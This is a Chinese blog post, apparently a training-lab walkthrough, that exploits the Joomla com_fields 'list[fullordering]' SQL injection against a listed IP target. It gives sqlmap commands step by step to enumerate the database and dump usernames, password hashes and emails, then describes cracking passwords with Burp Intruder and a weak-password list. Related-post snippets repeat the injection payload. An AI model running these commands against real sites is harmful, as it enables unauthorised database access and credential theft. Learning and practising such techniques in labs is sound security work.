sqlmap 注入 Joomla系列

已于 2022-04-05 16:42:06 修改
阅读量5.6k 收藏 3
点赞数
分类专栏: 网络渗透 文章标签: linux web安全
于 2022-04-02 18:04:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_59711856/article/details/123925863
版权

这里我用的是 joomla 先进入 txt 网站平台 网站:http://110.40.154.100:8080/?id=1

第一步:找注入点

"http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]="

第二步:打开kali 用sqlmap 爆破 找其数据库名(过程很慢 耐心等待)

sqlmap -u "http://110.40.154.100:8080/index.php option=com_fields&view=fields&layout=modal&list[fullordering]=" --dbs 

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5L2Z56yZLic=,size_20,color_FFFFFF,t_70,g_se,x_16watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5L2Z56yZLic=,size_20,color_FFFFFF,t_70,g_se,x_16

 第三步:在joomla 库中找表名 (过程很慢 耐心等待)

 sqlmap -u "http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D joomla --tables

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5L2Z56yZLic=,size_20,color_FFFFFF,t_70,g_se,x_16

这样表名就出来了

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5L2Z56yZLic=,size_20,color_FFFFFF,t_70,g_se,x_16

 第四步:在表中找字段名  (过程很慢 耐心等待)

 sqlmap -u "http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D joomla -T '#__users' --columns  

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5L2Z56yZLic=,size_20,color_FFFFFF,t_70,g_se,x_16

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5L2Z56yZLic=,size_20,color_FFFFFF,t_70,g_se,x_16

 这样列名就出来了

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5L2Z56yZLic=,size_20,color_FFFFFF,t_70,g_se,x_16

 最后一步 找 用户名、密码和邮箱

sqlmap -u "http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D joomla -T '#__users' -C username,password,email --dump

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5L2Z56yZLic=,size_20,color_FFFFFF,t_70,g_se,x_16

 稍等一会 用户名、密码和邮箱就已经破解成功了(这里的密码进行加密了)watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5L2Z56yZLic=,size_20,color_FFFFFF,t_70,g_se,x_16

接着我们进入到 burp中 开始破解密码

先设置代理 账号root 密码随便输一个开始抓包 

这里已经抓好包了 我们把它发送到 intruder模块进行爆破

将里边的变量清除  将密码添加变量  再进入到payloads里

 

再 打开 zidian(弱口令)破解 再点击startattack 进行弱口令破解

 这样就破解完成了 可以看到 root 和admin 的字段和其他人不一样 ,所以密码就是这两个中的其一

余笙.'
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入JOOMLA系列
m0_64181446的博客
04-06 3293
一:首先进入txt平台网站Homehttp://110.40.154.100:8080/?id=1找到报错注入点;将“[ ]”符号转换为url编码。 二:打开kali并开启root权限,利用sqlmap扫描其数据库。--dbs,找出JOOMLA表。 三:进入JOOMLA系列表-D joomla --tables,得出users列表。 四:进入#__users列中并指定想要获取的信息。 得出账号,密码,邮箱 ...
sqlmap注入详解(joomla案例)
m0_63028223的博客
04-01 2760
我们以该网站为例: 我们需要先找到其报错注入点: 再次要注意:报错注入点中的 ‘ [] ’ 符号是不能为sqlmap所识别的。我们所需要将其转换为url编码。 之后进入正题 打开kali并开启root权限,利用sqlmap扫描其数据库。--dbs 这时候我们得到了该网站的五个表。 我们进入joomla表中。-D joomla --tables 之后我们进入#__users列中并指定想要获取的信息。 这时候便得到了我们想要的账户,密码,以及邮箱。 此密码经过加密,解密..
Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境
weixin_45653478的博客
05-17 489
Joomla是一个基于PHP的内容管理系统(CMS),广泛应用于各类网站。2017年,Joomla 3.7.0版本被发现存在SQL注入漏洞(CVE-2017-8917),攻击者可以利用该漏洞对数据库进行未授权查询或操作,可能导致数据泄露、篡改甚至删除。
Joomla SQL注入
m0_67612076的博客
04-07 549
首先: 登录“110.40.154.100:8080”。然后在其后输入 :“index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml”进入这个界面 然后进入sqlmap进入注入: 第一步:sqlmap.py -u"http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layo
Joomla3.7.0 (CVE-2017-8917) SQL注入漏洞复现
weixin_42786460的博客
09-01 1290
Joomla3.7.0 (CVE-2017-8917) SQL注入漏洞复现
CMS Joomla SQL 注入漏洞(CVE-2017-8917 )
CuiXY's Blog
01-18 827
0x01 原理 1.Joomla是内容管理的网站程序,也就是CMS。漏洞原理是com_fields组件,对请求数据过滤不严谨,从而导致sql注入。这个就是有问题的代码,可以看出sql根本没有过滤,通过对list中的fullordering这个字段的精心构造,就可以完成sql攻击 2.追根溯源,网站程序Joomla的com_fields启动时,会调用display这个方法 3.display这个...
sqlmap注入漏洞测试
02-22
SQLMap 注入漏洞测试 在 Web 应用程序中, SQL 注入是一种常见的安全漏洞,它可以让攻击者访问和控制数据库中的敏感数据。SQLMap 是一款自动化的 SQL 注入工具,它可以检测和利用 SQL 注入漏洞,以获取数据库中的...
sqlmap注入神器
12-30
sqlmap是一款注入神器,灵活的运作它将是你更有效率的完成工作
SQLmap注入工具
09-20
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, ...
SqlMap注入软件
03-29
SqlMap是一款强大的自动化工具,专为安全专家设计,用于检测和利用SQL注入漏洞。这款开源软件在渗透测试领域中有着广泛的应用,被誉为检测和利用SQL注入的“神器”。它的核心功能在于,通过智能分析和利用潜在的SQL...
sqlmap注入
10-26
SQLMap是一种广泛使用的开源自动化工具,专门用于检测和利用SQL注入漏洞。它的主要目标是帮助安全研究人员和渗透测试者在Web应用程序中发现和利用数据库漏洞。以下是对SQLMap注入相关知识点的详细介绍: **1. SQL...
CVE-2015-7857 Joomla注入漏洞利用工具
04-18
CVE-2015-7857 Joomla注入漏洞利用工具,有需要自行下载
Joomla SQL注入漏洞(CVE-2017-8917)
weixin_45630387的博客
03-18 603
根据vulhub文档直接访问http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1),即可看到SQL报错信息。参考vulhub中文文档:https://github.com/vulhub/vulhub/blob/master/joomla/CVE-2017-8917/README.zh-cn.md。
Joomla二阶注入(CVE-2018-6376)复现
qiqi_w的博客
11-30 401
Joomla二阶注入(CVE-2018-6376)复现
joomla代码审计漏洞-POST注入
qq_54735393的博客
03-07 170
利用Seay代码审计系统对joomla源代码审计,找到可疑漏洞注入点,进行注入
Joomla:SQLi利用
prettyX的博客
12-05 506
今天来开拓一下思路 : ) 背景: 当发现SQLi漏洞时,后续如何利用呢?今天尝试一下利用Session登录。 环境准备: BurpSuite Firefox phpstudy:并安装好phpMyAdmin Joomla 3.7.0 下载地址 :https://downloads.joomla.org/cms/joomla3 在phpstudy上将Joomla安装、配置好,并连...
joomla3.7.0sql注入漏洞复现
SUPER131110的博客
08-30 378
[在这里插入图片描述](https://img-blog.csdnimg.cn/在这里插入图片描述。
Joomla 3.7.0 SQL注入漏洞
小小猪的博客
12-01 2112
Joomla 3.7.0 SQL注入漏洞 漏洞描述: 漏洞本质是Joomla对session数据处理不当,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,获取服务器权限,实现远程命令执行。 影响范围: Joomla 3.0.0-3.4.6 环境搭建: 这里采用安鸾渗透实战 地址 漏洞复现: 打开之后页面 安装完成后,构造payload /index.php?option=com_fields&view=fields&layout=modal&list..
sqlmap注入教学
最新发布
07-07
SQLMap是一个著名的开源工具,用于自动检测和利用SQL注入漏洞,特别是在Web应用程序中。它通过构造和发送一系列精心设计的SQL查询,旨在获取、修改或控制数据库的信息。SQLMap支持多种数据库系统,如MySQL、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

余笙.'

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值